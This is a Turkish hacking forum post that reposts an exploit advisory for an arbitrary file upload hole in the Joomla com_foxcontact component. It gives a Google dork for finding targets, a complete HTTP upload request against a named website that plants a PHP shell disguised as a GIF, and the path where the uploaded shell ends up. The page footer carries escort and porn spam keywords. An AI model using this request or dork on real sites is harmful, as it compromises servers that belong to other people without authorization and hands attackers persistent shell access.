KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Joomla com_foxcontact File Upload
Konu : Joomla com_foxcontact File Upload - 05.10.2013, 21:32
Mesaj: #1
PHP Kod:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                  I'm DaOne member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: Joomla Component (com_foxcontact) Arbitrary File Upload Vulnerability
# Author: DaOne aka MockingBird
# Vendor Homepage: http://www.fox.ra.it/
# Price: €10
# Category: webapps/php
# Version: 1.0.8
# Google dork: inurl:index.php?option=com_foxcontact
------------------------------------------------------------------------
 
# Exploit
-HTTP Header Example-
POST http://www.res.cat/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1
Host: www.res.cat
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
GIF89a<?php shell ?>
 
 
----------------
Shell path: /components/com_foxcontact/uploads/{hash}_{filename}.php 

Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort türk ifşa hd porno